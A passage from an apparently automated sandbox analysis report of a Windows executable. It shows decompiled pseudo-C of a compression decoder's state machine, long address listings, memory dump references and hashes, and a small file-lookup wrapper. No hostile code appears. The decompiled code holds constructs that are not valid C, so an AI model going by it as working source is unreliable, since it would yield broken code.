								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							goto L36;
						case 0xe:
							goto L45;
						case 0xf:
							goto L57;
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							L68:
							__esi =  *(__ebp - 0x58);
							 *(__ebp - 0x84) = 0x12;
							goto L132;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							goto L55;
						case 0x1b:
							L75:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1b;
								goto L170;
							}
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							__eflags = __eax -  *(__ebp - 0x74);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
								__eflags = __eax;
							}
							__edx =  *(__ebp - 8);
							__cl =  *(__eax + __edx);
							__eax =  *(__ebp - 0x14);
							 *(__ebp - 0x5c) = __cl;
							 *(__eax + __edx) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t274 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t274;
							__eax =  *(__ebp - 0x68);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							_t283 = __ebp - 0x64;
							 *_t283 =  *(__ebp - 0x64) - 1;
							__eflags =  *_t283;
							 *( *(__ebp - 0x68)) = __cl;
							goto L79;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = __edx;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}













              0x00000000
              0x00406c5b
              0x00406c5b
              0x00406c60
              0x00406cd7
              0x00406cde
              0x00406ce8
              0x004072c7
              0x004072c7
              0x004072ca
              0x004072ca
              0x004072d0
              0x004072d6
              0x004072dc
              0x004072f6
              0x004072f9
              0x004072ff
              0x0040730a
              0x0040730c
              0x004072de
              0x004072de
              0x004072ed
              0x004072f1
              0x004072f1
              0x00407316
              0x0040733d
              0x0040733d
              0x00407343
              0x00407343
              0x00000000
              0x00407318
              0x00407318
              0x0040731c
              0x004074cb
              0x00000000
              0x004074cb
              0x00407328
              0x0040732f
              0x00407337
              0x0040733a
              0x00000000
              0x0040733a
              0x00406c62
              0x00406c62
              0x00406c66
              0x00406c6e
              0x00406c71
              0x00406c73
              0x00406c76
              0x00406c78
              0x00406c7d
              0x00406c80
              0x00406c87
              0x00406c8e
              0x00406c91
              0x00406c9c
              0x00406ca4
              0x00406ca4
              0x00406c9e
              0x00406c9e
              0x00406c9e
              0x00406c93
              0x00406c93
              0x00406c93
              0x00406cab
              0x00406cc9
              0x00406ccb
              0x00406e9e
              0x00406e9e
              0x00406ea1
              0x00406ea4
              0x00406ea7
              0x00406eaa
              0x00406ead
              0x00406eb0
              0x00406eb3
              0x00406eb6
              0x00406ebc
              0x00406ed4
              0x00406ed7
              0x00406eda
              0x00406edd
              0x00406edd
              0x00406ee0
              0x00406ee6
              0x00406ebe
              0x00406ebe
              0x00406ec6
              0x00406ecb
              0x00406ecd
              0x00406ecf
              0x00406ecf
              0x00406ef0
              0x00406ef3
              0x00406e96
              0x00406e9c
              0x00000000
              0x00000000
              0x00000000
              0x00406ef5
              0x00406e71
              0x00406e75
              0x0040747d
              0x00000000
              0x0040747d
              0x00406e7b
              0x00406e7e
              0x00406e81
              0x00406e85
              0x00406e88
              0x00406e8e
              0x00406e90
              0x00406e90
              0x00406e93
              0x00000000
              0x00406e93
              0x00406cad
              0x00406cad
              0x00406cb0
              0x00406cb6
              0x00406cb8
              0x00406cb8
              0x00406cbb
              0x00406cbe
              0x00406cc0
              0x00406cc1
              0x00406cc4
              0x00406d31
              0x00406d31
              0x00406d35
              0x00406d38
              0x00406d3b
              0x00406d3e
              0x00406d41
              0x00406d42
              0x00406d45
              0x00406d47
              0x00406d4d
              0x00406d50
              0x00406d53
              0x00406d56
              0x00406d59
              0x00406d5f
              0x00406d7b
              0x00406d7e
              0x00406d81
              0x00406d84
              0x00406d8b
              0x00406d91
              0x00406d95
              0x00406d61
              0x00406d61
              0x00406d65
              0x00406d6d
              0x00406d72
              0x00406d74
              0x00406d76
              0x00406d76
              0x00406d9f
              0x00406da2
              0x00406d19
              0x00406d19
              0x00406d1f
              0x00406dd2
              0x00406dd8
              0x00000000
              0x00000000
              0x00406dda
              0x00406ddd
              0x00406de0
              0x00406de3
              0x00406de6
              0x00406de9
              0x00406dec
              0x00406def
              0x00406df2
              0x00406df8
              0x00406e10
              0x00406e13
              0x00406e16
              0x00406e19
              0x00406e19
              0x00406e1c
              0x00406e22
              0x00406dfa
              0x00406dfa
              0x00406e02
              0x00406e07
              0x00406e09
              0x00406e0b
              0x00406e0b
              0x00406e2c
              0x00406e2f
              0x00406dad
              0x00406db1
              0x00407471
              0x00000000
              0x00407471
              0x00406db7
              0x00406dba
              0x00406dbd
              0x00406dc1
              0x00406dc4
              0x00406dca
              0x00406dcc
              0x00406dcc
              0x00406dcf
              0x00406dcf
              0x00406e2f
              0x00406e36
              0x00406e36
              0x00406e36
              0x00406e3a
              0x00406e3a
              0x00406e3d
              0x00406e40
              0x00406e44
              0x00407489
              0x00000000
              0x00407489
              0x00406e4a
              0x00406e4d
              0x00406e50
              0x00406e53
              0x00406e56
              0x00406e59
              0x00406e5c
              0x00406e5e
              0x00406e61
              0x00406e64
              0x00406e67
              0x00406e69
              0x00406e69
              0x00406e69
              0x00407006
              0x00407006
              0x00407009
              0x00407009
              0x00000000
              0x00407009
              0x00406d2b
              0x00000000
              0x00000000
              0x00000000
              0x00406da8
              0x00406cf4
              0x00406cf8
              0x00407465
              0x004074e1
              0x004074e9
              0x004074f0
              0x004074f2
              0x004074f9
              0x004074fd
              0x004074fd
              0x00406cfe
              0x00406d01
              0x00406d04
              0x00406d08
              0x00406d0b
              0x00406d11
              0x00406d13
              0x00406d13
              0x00406d16
              0x00000000
              0x00406d16
              0x00406da2
              0x00406cab
              0x00406adf
              0x00406adf
              0x00406ae8
              0x004074f6
              0x004074f6
              0x00000000
              0x004074f6
              0x00406aee
              0x00000000
              0x00406af9
              0x00000000
              0x00000000
              0x00406b02
              0x00406b05
              0x00406b08
              0x00406b0c
              0x00000000
              0x00000000
              0x00406b12
              0x00406b15
              0x00406b17
              0x00406b18
              0x00406b1b
              0x00406b1d
              0x00406b1e
              0x00406b20
              0x00406b23
              0x00406b28
              0x00406b2d
              0x00406b36
              0x00406b49
              0x00406b4c
              0x00406b58
              0x00406b80
              0x00406b82
              0x00406b90
              0x00406b90
              0x00406b94
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00406b84
              0x00406b84
              0x00406b87
              0x00406b88
              0x00406b88
              0x00000000
              0x00406b84
              0x00406b5e
              0x00406b63
              0x00406b63
              0x00406b6c
              0x00406b74
              0x00406b77
              0x00000000
              0x00406b7d
              0x00406b7d
              0x00000000
              0x00406b7d
              0x00000000
              0x00406b9a
              0x00406b9a
              0x00406b9e
              0x0040744a
              0x00000000
              0x0040744a
              0x00406ba7
              0x00406bb7
              0x00406bba
              0x00406bbd
              0x00406bbd
              0x00406bbd
              0x00406bc0
              0x00406bc4
              0x00000000
              0x00000000
              0x00406bc6
              0x00406bcc
              0x00406bf6
              0x00406bfc
              0x00406c03
              0x00000000
              0x00406c03
              0x00406bd2
              0x00406bd5
              0x00406bda
              0x00406bda
              0x00406be5
              0x00406bed
              0x00406bf0
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00406c35
              0x00406c3b
              0x00406c3e
              0x00406c4b
              0x00406c53
              0x00000000
              0x00000000
              0x00406c0a
              0x00406c0a
              0x00406c0e
              0x00407459
              0x00000000
              0x00407459
              0x00406c1a
              0x00406c25
              0x00406c25
              0x00406c25
              0x00406c28
              0x00406c2b
              0x00406c2e
              0x00406c33
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00406efa
              0x00406efe
              0x00406f1c
              0x00406f1f
              0x00406f26
              0x00406f29
              0x00406f2c
              0x00406f2f
              0x00406f32
              0x00406f35
              0x00406f37
              0x00406f3e
              0x00406f3f
              0x00406f41
              0x00406f44
              0x00406f47
              0x00406f4a
              0x00406f4a
              0x00406f4f
              0x00000000
              0x00406f4f
              0x00406f00
              0x00406f03
              0x00406f06
              0x00406f10
              0x00000000
              0x00000000
              0x00406f64
              0x00406f68
              0x00406f8b
              0x00406f8e
              0x00406f91
              0x00406f9b
              0x00406f6a
              0x00406f6a
              0x00406f6d
              0x00406f70
              0x00406f73
              0x00406f80
              0x00406f83
              0x00406f83
              0x00000000
              0x00000000
              0x00406fa7
              0x00406fab
              0x00000000
              0x00000000
              0x00406fb1
              0x00406fb5
              0x00000000
              0x00000000
              0x00406fbb
              0x00406fbd
              0x00406fc1
              0x00406fc1
              0x00406fc4
              0x00406fc8
              0x00000000
              0x00000000
              0x00407018
              0x0040701c
              0x00407023
              0x00407026
              0x00407029
              0x00407033
              0x00000000
              0x00407033
              0x0040701e
              0x00000000
              0x00000000
              0x0040703f
              0x00407043
              0x0040704a
              0x0040704d
              0x00407050
              0x00407045
              0x00407045
              0x00407045
              0x00407053
              0x00407056
              0x00407059
              0x00407059
              0x0040705c
              0x0040705f
              0x00407062
              0x00407062
              0x00407065
              0x0040706c
              0x00407071
              0x00000000
              0x00000000
              0x004070ff
              0x004070ff
              0x00407103
              0x004074a1
              0x00000000
              0x004074a1
              0x00407109
              0x0040710c
              0x0040710f
              0x00407113
              0x00407116
              0x0040711c
              0x0040711e
              0x0040711e
              0x0040711e
              0x00407121
              0x00407124
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00407182
              0x00407182
              0x00407186
              0x004074ad
              0x00000000
              0x004074ad
              0x0040718c
              0x0040718f
              0x00407192
              0x00407196
              0x00407199
              0x0040719f
              0x004071a1
              0x004071a1
              0x004071a1
              0x004071a4
              0x00000000
              0x00000000
              0x00406f52
              0x00406f52
              0x00406f55
              0x00000000
              0x00000000
              0x00407291
              0x00407295
              0x004072b7
              0x004072ba
              0x004072c4
              0x00000000
              0x004072c4
              0x00407297
              0x0040729a
              0x0040729e
              0x004072a1
              0x004072a1
              0x004072a4
              0x00000000
              0x00000000
              0x0040734e
              0x00407352
              0x00407370
              0x00407370
              0x00407370
              0x00407377
              0x0040737e
              0x00407385
              0x00407385
              0x00000000
              0x00407385
              0x00407354
              0x00407357
              0x0040735a
              0x0040735d
              0x00407364
              0x004072a8
              0x004072a8
              0x004072ab
              0x00000000
              0x00000000
              0x0040743f
              0x00407442
              0x00000000
              0x00000000
              0x00407079
              0x0040707b
              0x00407082
              0x00407083
              0x00407085
              0x00407088
              0x00000000
              0x00000000
              0x00407090
              0x00407093
              0x00407096
              0x00407098
              0x0040709a
              0x0040709a
              0x0040709b
              0x0040709e
              0x004070a5
              0x004070a8
              0x004070b6
              0x00000000
              0x00000000
              0x0040738c
              0x0040738c
              0x0040738f
              0x00407396
              0x00000000
              0x00000000
              0x0040739b
              0x0040739b
              0x0040739f
              0x004074d7
              0x00000000
              0x004074d7
              0x004073a5
              0x004073a8
              0x004073ab
              0x004073af
              0x004073b2
              0x004073b8
              0x004073ba
              0x004073ba
              0x004073ba
              0x004073bd
              0x004073c0
              0x004073c0
              0x004073c0
              0x004073c0
              0x004073c3
              0x004073c3
              0x004073c7
              0x00407427
              0x0040742a
              0x0040742f
              0x00407430
              0x00407432
              0x00407434
              0x00407437
              0x00000000
              0x00407437
              0x004073c9
              0x004073cf
              0x004073d2
              0x004073d5
              0x004073d8
              0x004073db
              0x004073de
              0x004073e1
              0x004073e4
              0x004073e7
              0x004073ea
              0x00407403
              0x00407406
              0x00407409
              0x0040740c
              0x00407410
              0x00407412
              0x00407412
              0x00407413
              0x00407416
              0x004073ec
              0x004073ec
              0x004073f4
              0x004073f9
              0x004073fb
              0x004073fe
              0x004073fe
              0x00407419
              0x00407420
              0x00000000
              0x00407422
              0x00000000
              0x00407422
              0x00000000
              0x004070be
              0x004070c1
              0x004070f7
              0x00407227
              0x00407227
              0x00407227
              0x00407227
              0x0040722a
              0x0040722a
              0x0040722d
              0x0040722f
              0x004074b9
              0x00000000
              0x004074b9
              0x00407235
              0x00407238
              0x00000000
              0x00000000
              0x0040723e
              0x00407242
              0x00407245
              0x00407245
              0x00407245
              0x00000000
              0x00407245
              0x004070c3
              0x004070c5
              0x004070c7
              0x004070c9
              0x004070cc
              0x004070cd
              0x004070cf
              0x004070d1
              0x004070d4
              0x004070d7
              0x004070ed
              0x004070f2
              0x0040712a
              0x0040712a
              0x0040712e
              0x0040715a
              0x0040715c
              0x00407163
              0x00407166
              0x00407169
              0x00407169
              0x0040716e
              0x0040716e
              0x00407170
              0x00407173
              0x0040717a
              0x0040717d
              0x004071aa
              0x004071aa
              0x004071ad
              0x004071b0
              0x00407224
              0x00407224
              0x00407224
              0x00000000
              0x00407224
              0x004071b2
              0x004071b8
              0x004071bb
              0x004071be
              0x004071c1
              0x004071c4
              0x004071c7
              0x004071ca
              0x004071cd
              0x004071d0
              0x004071d3
              0x004071ec
              0x004071ee
              0x004071f1
              0x004071f2
              0x004071f5
              0x004071f7
              0x004071fa
              0x004071fc
              0x004071fe
              0x00407201
              0x00407203
              0x00407206
              0x0040720a
              0x0040720c
              0x0040720c
              0x0040720d
              0x00407210
              0x00407213
              0x004071d5
              0x004071d5
              0x004071dd
              0x004071e2
              0x004071e4
              0x004071e7
              0x004071e7
              0x00407216
              0x0040721d
              0x004071a7
              0x004071a7
              0x004071a7
              0x004071a7
              0x00000000
              0x0040721f
              0x00000000
              0x0040721f
              0x0040721d
              0x00407130
              0x00407133
              0x00407135
              0x00407138
              0x0040713b
              0x0040713e
              0x00407140
              0x00407143
              0x00407146
              0x00407146
              0x00407149
              0x00407149
              0x0040714c
              0x00407153
              0x00407127
              0x00407127
              0x00407127
              0x00407127
              0x00000000
              0x00407155
              0x00000000
              0x00407155
              0x00407153
              0x004070d9
              0x004070dc
              0x004070de
              0x004070e1
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00406fcb
              0x00406fcb
              0x00406fcf
              0x00407495
              0x00000000
              0x00407495
              0x00406fd5
              0x00406fd8
              0x00406fdb
              0x00406fde
              0x00406fe0
              0x00406fe0
              0x00406fe0
              0x00406fe3
              0x00406fe6
              0x00406fe9
              0x00406fec
              0x00406fef
              0x00406ff2
              0x00406ff3
              0x00406ff5
              0x00406ff5
              0x00406ff5
              0x00406ff8
              0x00406ffb
              0x00406ffe
              0x00407001
              0x00407001
              0x00407001
              0x00407004
              0x00000000
              0x00000000
              0x00407248
              0x00407248
              0x00407248
              0x0040724c
              0x00000000
              0x00000000
              0x00407252
              0x00407255
              0x00407258
              0x0040725b
              0x0040725d
              0x0040725d
              0x0040725d
              0x00407260
              0x00407263
              0x00407266
              0x00407269
              0x0040726c
              0x0040726f
              0x00407270
              0x00407272
              0x00407272
              0x00407272
              0x00407275
              0x00407278
              0x0040727b
              0x0040727e
              0x00407281
              0x00407285
              0x00407287
              0x0040728a
              0x00000000
              0x0040728c
              0x00000000
              0x0040728c
              0x0040728a
              0x004074bf
              0x00000000
              0x00000000
              0x00406aee

              Memory Dump Source
              • Source File: 00000001.00000002.665305559.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000001.00000002.665292449.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.665364092.0000000000408000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.665378913.000000000040A000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665383681.000000000040C000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665411947.0000000000414000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665438070.0000000000427000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665452320.0000000000435000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665456458.0000000000437000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665468957.000000000043B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 4c5fc7cef62123189b146ae20f9b137f8dd1da47d9d14d17752a01c0449262ee
              • Instruction ID: b5fdc14d1eddcf89792e2e646b4c6bd06a53190dca3d1b375e16d2eed6ded591
              • Opcode Fuzzy Hash: 4c5fc7cef62123189b146ae20f9b137f8dd1da47d9d14d17752a01c0449262ee
              • Instruction Fuzzy Hash: 78F16970D04229CBDF28CFA8C8946ADBBB1FF44305F15816ED856BB281D7386A86DF45
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0040689A, Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E0040689A(WCHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileW(_a4, 0x426798); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x426798;
			}




              0x004068a5
              0x004068ae
              0x00000000
              0x004068bb
              0x004068b1
              0x00000000

              APIs
              • FindFirstFileW.KERNELBASE(73BCFAA0,00426798,00425F50,00405F62,00425F50,00425F50,00000000,00425F50,00425F50,73BCFAA0,?,73BCF560,00405C6E,?,73BCFAA0,73BCF560), ref: 004068A5
              • FindClose.KERNEL32(00000000), ref: 004068B1
              Memory Dump Source
              • Source File: 00000001.00000002.665305559.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000001.00000002.665292449.0000000000400000.00000002.00020000.sdmp Download File
